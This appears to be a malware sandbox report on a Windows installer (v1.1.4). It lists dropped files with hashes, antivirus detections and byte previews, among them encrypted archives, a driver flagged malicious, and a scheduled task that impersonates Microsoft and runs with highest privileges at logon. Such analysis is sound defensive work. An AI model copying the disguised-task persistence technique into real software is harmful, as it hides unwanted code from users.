                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                          C:\Program Files (x86)\Windows NT\locale7.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                          C:\Program Files (x86)\Windows NT\locale7.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                          C:\Program Files (x86)\Windows NT\res.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.99990591527987
                          Encrypted:true
                          SSDEEP:49152:5Mo17OIO8i/NM7F39GTSBWKeQifmq9EV19:io17O8i/+7B9ScF1q9019
                          MD5:CB8B923780CA9DCAB3C2D8A9A6C79544
                          SHA1:4E0A293B329E8A4A2898782065A2DA4882DC22D9
                          SHA-256:666C2E43D2841673A0CC05B94DDE575C4398BEA21805A5DDDF2A2777A3517CCF
                          SHA-512:A1C1DB233E8C3724DE52429C43D8A33E5BB9878D0170F2965DAA4AC2825755BF4AB170B3A6340A8E98867C46001D4861A3F055F219F4E081D9C92C0431458C51
                          Malicious:false
                          Preview:7z..'...}PQ&.U......@..........`{s...(H(..)QM......7 ..T.L.9M.dk..u..r.J{..U.= ...Oe..$np.Y.:.q..L..oYj....T..L......>Q...4_.3..t..f..._....V@......X.MGl.=v....E..S5..a..i[..vjV.......?....;]s...].......E.e=....<........A..(.V!.j.5S.y.}.f..^g..|.AZ.....gU........W..i.'.3...cJU.....U.e..P'&7.g...V.C.j....T.NB.{@.Q1...k...pd..6.A..=...."w.W....Va.L...GS.t-..+......q^.............{..&@3.-..n..Ggg.......&yp.6S..2...w...l.I&...vn..L...[.l........[..mcX..R.J*.<..7.....?N..E...=....>....*.V..vH0... %.4.....p.g.x.}.....o..`.U..=3-..kJg.H..)4...p;3>.z.p9}.v...k"....1..6:...>..b......7H.o.....FhsR.......y..S{VX...a.$&y..`.L...1C6.~..iN.....)s&...._........ck.k^>.m.nH&. C.iY.....c.Y...66.....RY....7.....B:.@....O<....n<..f..._:..8W.......&....Xw..&....3D......2E..+.y$H"".?..b.c...~...-D.4...Q.....g..r...)=Jg......T....;@..BhW:...(1E...N{q...c.&t+E.&.:..5`...X.;"..U8...4*..........'(i...T..X|..s7...:.<......<*g.IrM{^.8.."..r.#|....@

                          C:\Program Files (x86)\Windows NT\tProtect.dll

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          • Antivirus: Virustotal, Detection: 6%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\task.xml

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3443983145211007
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                          MD5:1E67E91688292692932CD9096EDEA2BD
                          SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                          SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                          SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva

                          C:\Program Files (x86)\Windows NT\trash

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1672472
                          Entropy (8bit):7.999884409585901
                          Encrypted:true
                          SSDEEP:24576:t+DyQWCAIHJxhRLxs1IF2D2PWbUuSLAQCxOBNlnua+1iPcxgE+63xOUuCtuR:oZWdi1s1IF8BUnLCYBNlV+1xkmOU4
                          MD5:C3FFBA57909DE6ACDC3EA1EE393C9961
                          SHA1:B0FBA32B27E62CADD088C05645355DD5F11E323A
                          SHA-256:80EBA8624265A018E2C61497F32A20E6F5F13E37361E6214523096B9E47D2034
                          SHA-512:E3A4512C0B16B14682472C45DA2102142C26DE228BBFFFD9B5F22F41048CA4CE2830CBF575A00934A961CBF1ED76E6DD1129480F41920D13DC6B914BF45BA57E
                          Malicious:false
                          Preview:2..L..P...}..<..nvC...6...~.F...:.. /!ktJ.c.R.7...H.h.&Q..Xz.}.....Y..[.i.(.#....ta....g...$...q.\..S..fP....t........4..E.(.......{..V...4.7.(.. w4\+..<1..7.<..|y?..F..&....i...=c.#.+.)&...A...81j.9..j`.{R..\m..D3.....w..x.'Wu.!.*.W.1.x7....:sDu.....T7.n.......M.n.t.-.s.O>..y\..L.{x.>...........;3.)..G...R..#.G..{.}z-..|...C.w..c.4.....T}....E.. .={C!...Y...G..bnpV.......8j ...."..&...o...Q.bw.Ca.u&z..%..%.H!.3j]P..+*..m*.x.8e..NP.lc0.o....(... .-G... .Ct..\..8../.%.Y.Wq.....-%f.......y.!C..m}6E...R....P.....a.1*.q..o...t..~v.....7..Z.:.[.:%$....{..k.O..&5.8.{..|....TQ..{.._)..7......<@J.P.......!..v.[..i...S..kHo.i....Et...r...>Uw....7......L.G!.U..vP..C..r...od.o.-...s-..KVU..vx..k..D....3.9m..:1...H"S...}.GZ..V.+c..IU.)....N=~..4..^YJ.......a?SA..V.x.U..e.z.t.h.G.......g.;./..q=~.}.PZ...O....dz......./..#z.e=2b<....Z..'.hr.hz.......U7,../'....*7P..d.FD.j......Im#.O.Hbz.uN.j...Sd.(>.z....b..y.....0.8..T...4K_=9.v'..Kj.Pq4....+@.5bl

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:NlllulpgztZ:NllUO
                          MD5:ADB67D140C904AFBF0D2C47FCFC73086
                          SHA1:CAA1973FC7AB5367DC2007487049041C6D0AC54E
                          SHA-256:BA09CC360CD10629A32D8E84392BAD452284123893B0792F6417340A72E3B951
                          SHA-512:85BE6449222EAA096A6F84E051D16DB1147498DA621BDB6C7B5D11CF6C306DB4DE90CEB457EDE22CCA53BC94CF4D1E6D0FAE203D196AF7AF225AF87464E1286E
                          Malicious:false
                          Preview:@...e.................................x..............@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gfuvdwl.q4w.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtdujsqp.k33.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp1r0iia.vmp.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtu5gb1h.o0w.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.5305591301859165
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:833E148BCEB71E3D12C96B53539F24E1
                          SHA1:C7DCDF06DC1045595F9F914C822E04ECBA7ADB6F
                          SHA-256:FE66E967480D9E0A1D307B21F310D6AF3C00789F680CE8E21ABD2AEE8F1C565A
                          SHA-512:F6E9E5C7B63E301AE5F8CE22F61247581DA00C0119615014740EAB272CDBC75B1BBC995F9A6905C8A087679AB8DBBDF47560C78F3FEE8873B1390791A66D9BA2
                          Malicious:true
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 1%, Browse
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.5305591301859165
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:833E148BCEB71E3D12C96B53539F24E1
                          SHA1:C7DCDF06DC1045595F9F914C822E04ECBA7ADB6F
                          SHA-256:FE66E967480D9E0A1D307B21F310D6AF3C00789F680CE8E21ABD2AEE8F1C565A
                          SHA-512:F6E9E5C7B63E301AE5F8CE22F61247581DA00C0119615014740EAB272CDBC75B1BBC995F9A6905C8A087679AB8DBBDF47560C78F3FEE8873B1390791A66D9BA2
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          \Device\ConDrv

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946143883607197
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File size:7'237'925 bytes
                          MD5:704d909b74fde4f05ceba394fc91416b
                          SHA1:e78859d87194b3968f1492e18f93424ccd946d63
                          SHA256:a7e3fad1d01f1888aa10d040699857288d4c6b4dc0e77eb5381e34c5c9e8e4e9
                          SHA512:4791bee70217a33962f563ea424ce586ec2140bb26b0c77572a2f9876695948a3f77512246994673f954d5cfdae7085c483775567175bae01136a5c31f46dabc
                          SSDEEP:98304:XwRE4sdlQNRIvth0lw8pUEkCYNlN6BMy66dmEdlvCOcIoodMwZgq:lPvP0lw8polKMy66nLvCOcIdV
                          TLSH:0C761222F2C7D53EE06D0B3B09B2A15454FBAA656423AE1796ECB4ECCF350501D3E687
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:0c0c2d33ceec80aa

                          Static PE Info

                          General

                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
